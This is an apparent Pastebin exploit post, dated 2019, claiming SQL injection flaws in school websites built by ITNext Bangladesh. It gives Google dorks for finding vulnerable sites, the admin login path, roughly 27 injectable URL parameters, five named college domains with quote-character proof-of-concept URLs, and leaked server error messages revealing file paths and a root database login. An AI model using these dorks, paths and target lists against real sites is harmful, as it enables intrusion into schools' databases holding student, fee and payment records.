Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################
- # Exploit Title : Powered By ITNext Bangladesh Solutions Limited SQL Injection Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 08/01/2019
- # Vendor Homepage : itnext.com.bd ~ edu-bd.org
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:''This is Web-App Not Only A Website!!!
- Powered By ITNext>>'' site:edu.bd
- intext:''Powered By ITNext>>'' site:edu.bd
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # Cyberizm Exploit Reference Link :
- cyberizm.org/cyberizm-itnext-bangladesh-solutions-limited-sql-injection.html
- # CXSecurity Exploit Reference Link :
- cxsecurity.com/issue/WLB-2019010042
- ###################################################################
- # Admin Panel Login Path :
- *************************
- /index.php?cat=quicklink&del=login
- # SQL Injection Exploits :
- ***********************
- /admission/index.php?cat=[SQL Injection]
- /index.php?cat=quicklink&del=[SQL Injection]
- /index.php?cat=Home&del=[SQL Injection]
- /index.php?cat=Principal&del=[SQL Injection]
- /index.php?cat=Vice%20Principal&del=[SQL Injection]
- /index.php?cat=Teachers&del=[SQL Injection]
- /index.php?cat=Students&del=[SQL Injection]
- /index.php?cat=Brief%20History&del=[SQL Injection]
- /index.php?cat=Tuition%20Fees&del=[SQL Injection]
- /index.php?cat=Attendence&del=[SQL Injection]
- /index.php?cat=List%20of%20Holiday&del=[SQL Injection]
- /index.php?cat=Class%20Schedule&del=[SQL Injection]
- /index.php?cat=Academic%20Calander&del=[SQL Injection]
- /index.php?cat=Admission%20Fees&del=[SQL Injection]
- /index.php?cat=Admission%20Open&del=[SQL Injection]
- /index.php?cat=Laboratory&del=[SQL Injection]
- /index.php?cat=Computer%20Lab&del=[SQL Injection]
- /index.php?cat=College%20Library&del=[SQL Injection]
- /index.php?cat=ACADEMIC&del=[SQL Injection]
- /index.php?cat=ADMISSION&del=[SQL Injection]
- /index.php?cat=Check%20Dues&del=[SQL Injection]
- /index.php?cat=Online%20Payments&del=[SQL Injection]
- /index.php?cat=News%20Corner&del=[SQL Injection]
- /index.php?cat=Notice%20Board&del=[SQL Injection]
- /index.php?cat=Photo%20Gallery&del=[SQL Injection]
- /index.php?cat=Email%20Us&del=[SQL Injection]
- /index.php?cat=Find%20Us&del=[SQL Injection]
- ###################################################################
- # Example Vulnerable Sites =>
- ***************************
- Note => (107.155.116.175) => There are 14 domains hosted on this server.
- [+] mohsincollege.edu.bd/index.php?cat=quicklink&del=1%27
- => [ Proof of Concept for SQL Injection ] => archive.vn/xBSoT
- [+] ramucollege.edu.bd/admission/index.php?cat=1'
- [+] bakoliagovcollege.edu.bd/index.php?cat=quicklink&del=1%27
- [+] pol-inst-cmp.edu.bd/index.php?cat=quicklink&del=1%27
- [+] cgc.edu.bd/index.php?cat=quicklink&del=1%27
- ###################################################################
- # SQL Database Error :
- *********************
- Warning: include(pages/1'.php): failed to open stream:
- No such file or directory in /home/mcollege/public_html/index.php on line 426
- Warning: include(): Failed opening 'pages/1'.php' for inclusion
- (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/mcollege/public_html/index.php on line 426
- Warning: mysql_connect(): Access denied for user 'root'@'localhost'
- (using password: YES) in /home/ramucollege/public_html/admission/db_connect.php on line 22
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################
Add Comment
Please, Sign In to add comment